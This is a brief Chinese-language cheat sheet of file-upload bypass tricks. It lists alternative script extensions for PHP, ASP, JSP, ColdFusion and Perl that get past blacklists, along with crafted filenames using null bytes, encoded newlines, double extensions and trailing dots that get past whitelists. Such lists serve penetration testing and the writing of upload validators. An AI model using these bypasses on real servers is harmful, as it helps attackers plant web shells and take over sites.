|
常见的一些脚本文件上传绕过后缀,包括白名单和黑名单,来源于互联网,仅供参考。 在尝试过程中,可以通过 黑名单绕过:不同脚本语言支持的解析后缀 黑名单简单来说就是目标程序规定了哪些文件不能上传 PHP脚本后缀绕过 → .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module
ASP 脚本后缀绕过→ .asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml
Jsp 脚本后缀绕过→ .jsp, .jspx, .jsw, .jsv, .jspf
Coldfusion → .cfm, .cfml, .cfc, .dbm
Perl → .pl, .cgi
随机大小写变换 → .pHp, .pHP5, .PhAr
白名单绕过:针对安全设备检测后缀的形式进行绕过
白名单简单来说就是目标程序规定了能上传的后缀名 file.png.php
file.png.Php5
file.php%20
file.php%0a
file.php%00
file.php%0d%0a
file.php/
file.php.\
file.
file.php....
file.pHp5....
file.png.php
file.png.pHp5
file.php#.png
file.php%00.png
file.php\x00.png
file.php%0a.png
file.php%0d%0a.png
file.phpJunk123png
file.png.jpg.php
file.php%00.png%00.jpg
|
